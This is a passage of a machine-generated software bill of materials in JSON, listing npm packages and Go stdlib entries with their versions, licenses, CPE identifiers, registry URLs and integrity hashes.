otations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:socket:socket.io-parser:4.2.6:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/socket.io-parser@4.2.6","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/socket.io-parser/-/socket.io-parser-4.2.6.tgz","integrity":"sha512-asJqbVBDsBCJx0pTqw3WfesSY0iRX+2xzWEWzrpcH7L6fLzrhyF8WPI8UaeM4YCuDfpwA/cgsdugMsmtz8EJeg==","dependencies":{"@socket.io/component-emitter":"~3.1.0","debug":"~4.4.1"}}},{"id":"ef14348a3e7aef73","name":"source-map-js","version":"1.2.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"BSD-3-Clause","spdxExpression":"BSD-3-Clause","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:source-map-js:source-map-js:1.2.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:source-map-js:source_map_js:1.2.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:source_map_js:source-map-js:1.2.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:source_map_js:source_map_js:1.2.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:source-map:source-map-js:1.2.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:source-map:source_map_js:1.2.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:source_map:source-map-js:1.2.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:source_map:source_map_js:1.2.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:source:source-map-js:1.2.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:source:source_map_js:1.2.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/source-map-js@1.2.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/source-map-js/-/source-map-js-1.2.1.tgz","integrity":"sha512-UXWMKhLOwVKb728IUtQPXxfYU+usdybtUrK/8uGE8CQMvrhOpwvzDBwj0QhSL7MQc7vIsISBG8VQ8+IDQxpfQA==","dependencies":null}},{"id":"ae42b44f62499323","name":"standard-as-callback","version":"2.1.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:standard-as-callback:standard-as-callback:2.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:standard-as-callback:standard_as_callback:2.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:standard_as_callback:standard-as-callback:2.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:standard_as_callback:standard_as_callback:2.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:standard-as:standard-as-callback:2.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:standard-as:standard_as_callback:2.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:standard_as:standard-as-callback:2.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:standard_as:standard_as_callback:2.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:standard:standard-as-callback:2.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:standard:standard_as_callback:2.1.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/standard-as-callback@2.1.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/standard-as-callback/-/standard-as-callback-2.1.0.tgz","integrity":"sha512-qoRRSyROncaz1z0mvYqIE4lCd9p2R90i6GxW3uZv5ucSu8tU7B5HXUP1gG8pVZsYNVaXjk8ClXHPttLyxAL48A==","dependencies":null}},{"id":"7442cb30a409bd68","name":"statuses","version":"2.0.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:statuses:statuses:2.0.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/statuses@2.0.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/statuses/-/statuses-2.0.2.tgz","integrity":"sha512-DvEy55V3DB7uknRo+4iOGT5fP1slR8wQohVdknigZPMpMstaKJQWhwiYBACJE3Ul2pTnATihhBYnRhZQHGBiRw==","dependencies":null}},{"id":"755a3e00c5f656c9","name":"stdlib","version":"go1.20.12","type":"go-module","foundBy":"go-module-binary-cataloger","locations":[{"path":"/node_modules/@esbuild/darwin-arm64/bin/esbuild","accessPath":"/node_modules/@esbuild/darwin-arm64/bin/esbuild","annotations":{"evidence":"primary"}}],"licenses":[{"value":"BSD-3-Clause","spdxExpression":"BSD-3-Clause","type":"declared","urls":[],"locations":[]}],"language":"go","cpes":[{"cpe":"cpe:2.3:a:golang:go:1.20.12:-:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:golang/stdlib@1.20.12","metadataType":"go-module-buildinfo-entry","metadata":{"goCompiledVersion":"go1.20.12","architecture":""}},{"id":"e9a4a6eb4de31a0f","name":"stdlib","version":"go1.20.12","type":"go-module","foundBy":"go-module-binary-cataloger","locations":[{"path":"/node_modules/esbuild/bin/esbuild","accessPath":"/node_modules/esbuild/bin/esbuild","annotations":{"evidence":"primary"}}],"licenses":[{"value":"BSD-3-Clause","spdxExpression":"BSD-3-Clause","type":"declared","urls":[],"locations":[]}],"language":"go","cpes":[{"cpe":"cpe:2.3:a:golang:go:1.20.12:-:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:golang/stdlib@1.20.12","metadataType":"go-module-buildinfo-entry","metadata":{"goCompiledVersion":"go1.20.12","architecture":""}},{"id":"d6075f31d1f26f1b","name":"stream-events","version":"1.0.5","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:stream-events:stream-events:1.0.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:stream-events:stream_events:1.0.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:stream_events:stream-events:1.0.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:stream_events:stream_events:1.0.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:stream:stream-events:1.0.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:stream:stream_events:1.0.5:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/stream-events@1.0.5","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/stream-events/-/stream-events-1.0.5.tgz","integrity":"sha512-E1GUzBSgvct8Jsb3v2X15pjzN1tYebtbLaMg+eBOUOAxgbLoSbT2NS91ckc5lJD1KfLjId+jXJRgo0qnV5Nerg==","dependencies":{"stubs":"^3.0.0"}}},{"id":"1acff9076c855611","name":"stream-shift","version":"1.0.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:stream-shift:stream-shift:1.0.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:stream-shift:stream_shift:1.0.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:stream_shift:stream-shift:1.0.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:stream_shift:stream_shift:1.0.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:stream:stream-shift:1.0.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:stream:stream_shift:1.0.3:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/stream-shift@1.0.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/stream-shift/-/stream-shift-1.0.3.tgz","integrity":"sha512-76ORR0DO1o1hlKwTbi/DM3EXWGf3ZJYO8cXX5RJwnul2DEg2oyoZyjLNoQM8WsvZiFKCRfC1O0J7iCvie3RZmQ==","dependencies":null}},{"id":"c7163598759ab751","name":"streamsearch","version":"1.1.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:streamsearch:streamsearch:1.1.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/streamsearch@1.1.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/streamsearch/-/streamsearch-1.1.0.tgz","integrity":"sha512-Mcc5wHehp9aXz1ax6bZUyY5afg9u2rv5cqQI3mRrYkGC8rW2hM02jWuwjtL++LS5qinSyhj2QfLyNsuc+VsExg==","dependencies":null}},{"id":"6c7ed5b8c0bd71e8","name":"string-width","version":"4.2.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:string-width:string-width:4.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:string-width:string_width:4.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:string_width:string-width:4.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:string_width:string_width:4.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:string:string-width:4.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:string:string_width:4.2.3:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/string-width@4.2.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz","integrity":"sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==","dependencies":{"emoji-regex":"^8.0.0","is-fullwidth-code-point":"^3.0.0","strip-ansi":"^6.0.1"}}},{"id":"303a44f8f6ca903e","name":"string-width","version":"5.1.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:string-width:string-width:5.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:string-width:string_width:5.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:string_width:string-width:5.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:string_width:string_width:5.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:string:string-width:5.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:string:string_width:5.1.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/string-width@5.1.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/string-width/-/string-width-5.1.2.tgz","integrity":"sha512-HnLOCR3vjcY8beoNLtcjZ5/nxn2afmME6lhrDrebokqMap+XbeW8n9TXpPDOqdGK5qcI3oT0GKTW6wC7EMiVqA==","dependencies":{"eastasianwidth":"^0.2.0","emoji-regex":"^9.2.2","strip-ansi":"^7.0.1"}}},{"id":"829e7f04cb28f180","name":"string_decoder","version":"1.1.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:string-decoder:string-decoder:1.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:string-decoder:string_decoder:1.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:string_decoder:string-decoder:1.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:string_decoder:string_decoder:1.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:string:string-decoder:1.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:string:string_decoder:1.1.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/string_decoder@1.1.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz","integrity":"sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==","dependencies":{"safe-buffer":"~5.1.0"}}},{"id":"31e1990d6adabf2b","name":"string_decoder","version":"1.3.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:string-decoder:string-decoder:1.3.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:string-decoder:string_decoder:1.3.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:string_decoder:string-decoder:1.3.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:string_decoder:string_decoder:1.3.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:string:string-decoder:1.3.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:string:string_decoder:1.3.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/string_decoder@1.3.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/string_decoder/-/string_decoder-1.3.0.tgz","integrity":"sha512-hkRX8U1WjJFd8LsDJ2yQ/wWWxaopEsABU1XfkM8A+j0+85JAGppt16cr1Whg6KIbb4okU6Mql6BOj+uup/wKeA==","dependencies":{"safe-buffer":"~5.2.0"}}},{"id":"e47d9046945afbeb","name":"strip-ansi","version":"6.0.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:strip-ansi:strip-ansi:6.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:strip-ansi:strip_ansi:6.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:strip_ansi:strip-ansi:6.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:strip_ansi:strip_ansi:6.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:strip:strip-ansi:6.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:strip:strip_ansi:6.0.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/strip-ansi@6.0.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz","integrity":"sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==","dependencies":{"ansi-regex":"^5.0.1"}}},{"id":"efdaea275ca01865","name":"strip-ansi","version":"7.2.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:strip-ansi:strip-ansi:7.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:strip-ansi:strip_ansi:7.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:strip_ansi:strip-ansi:7.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:strip_ansi:strip_ansi:7.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:strip:strip-ansi:7.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:strip:strip_ansi:7.2.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/strip-ansi@7.2.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/strip-ansi/-/strip-ansi-7.2.0.tgz","integrity":"sha512-yDPMNjp4WyfYBkHnjIRLfca1i6KMyGCtsVgoKe/z1+6vukgaENdgGBZt+ZmKPc4gavvEZ5OgHfHdrazhgNyG7w==","dependencies":{"ansi-regex":"^6.2.2"}}},{"id":"9368f059f77a6fca","name":"strnum","version":"2.2.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:strnum:strnum:2.2.3:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/strnum@2.2.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/strnum/-/strnum-2.2.3.tgz","integrity":"sha512-oKx6RUCuHfT3oyVjtnrmn19H1SiCqgJSg+54XqURKp5aCMbrXrhLjRN9TjuwMjiYstZ0MzDrHqkGZ5dFTKd+zg==","dependencies":null}},{"id":"10401a0421b092a3","name":"stubs","version":"3.0.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:stubs:stubs:3.0.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/stubs@3.0.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/stubs/-/stubs-3.0.0.tgz","integrity":"sha512-PdHt7hHUJKxvTCgbKX9C1V/ftOcjJQgz8BZwNfV5c4B6dcGqlpelTbJ999jBGZ2jYiPAwcX5dP6oBwVlBlUbxw==","dependencies":null}},{"id":"b71f2c964dcb79d3","name":"styled-jsx","version":"5.1.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:styled-jsx:styled-jsx:5.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:styled-jsx:styled_jsx:5.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:styled_jsx:styled-jsx:5.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:styled_jsx:styled_jsx:5.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:styled:styled-jsx:5.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:styled:styled_jsx:5.1.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/styled-jsx@5.1.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/styled-jsx/-/styled-jsx-5.1.1.tgz","integrity":"sha512-pW7uC1l4mBZ8ugbiZrcIsiIvVx1UmTfw7UkC3Um2tmfUq9Bhk8IiyEIPl6F8agHgjzku6j0xQEZbfA5uSgSaCw==","dependencies":{"client-only":"0.0.1"}}},{"id":"302884898f3a35c4","name":"sucrase","version":"3.35.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:sucrase:sucrase:3.35.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/sucrase@3.35.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/sucrase/-/sucrase-3.35.1.tgz","integrity":"sha512-DhuTmvZWux4H1UOnWMB3sk0sbaCVOoQZjv8u1rDoTV0HTdGem9hkAZtl4JZy8P2z4Bg0nT+YMeOFyVr4zcG5Tw==","dependencies":{"@jridgewell/gen-mapping":"^0.3.2","commander":"^4.0.0","lines-and-columns":"^1.1.6","mz":"^2.7.0","pirates":"^4.0.1","tinyglobby":"^0.2.11","ts-interface-checker":"^0.1.9"}}},{"id":"cb6982ee071dbb85","name":"supports-preserve-symlinks-flag","version":"1.0.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:supports-preserve-symlinks-flag:supports-preserve-symlinks-flag:1.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:supports-preserve-symlinks-flag:supports_preserve_symlinks_flag:1.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:supports_preserve_symlinks_flag:supports-preserve-symlinks-flag:1.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:supports_preserve_symlinks_flag:supports_preserve_symlinks_flag:1.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:supports-preserve-symlinks:supports-preserve-symlinks-flag:1.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:supports-preserve-symlinks:supports_preserve_symlinks_flag:1.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:supports_preserve_symlinks:supports-preserve-symlinks-flag:1.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:supports_preserve_symlinks:supports_preserve_symlinks_flag:1.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:supports-preserve:supports-preserve-symlinks-flag:1.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:supports-preserve:supports_preserve_symlinks_flag:1.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:supports_preserve:supports-preserve-symlinks-flag:1.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:supports_preserve:supports_preserve_symlinks_flag:1.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:supports:supports-preserve-symlinks-flag:1.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:supports:supports_preserve_symlinks_flag:1.0.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/supports-preserve-symlinks-flag@1.0.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz","integrity":"sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==","dependencies":null}},{"id":"03465a3bffd322b9","name":"svg-arc-to-cubic-bezier","version":"3.2.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"ISC","spdxExpression":"ISC","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:svg-arc-to-cubic-bezier:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:svg-arc-to-cubic-bezier:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:svg_arc_to_cubic_bezier:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:svg_arc_to_cubic_bezier:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:svg-arc-to-cubic:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:svg-arc-to-cubic:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:svg_arc_to_cubic:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:svg_arc_to_cubic:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:svg-arc-to:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:svg-arc-to:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:svg_arc_to:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:svg_arc_to:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:svg-arc:svg-arc-to-cubic-bezier:3.2.0:*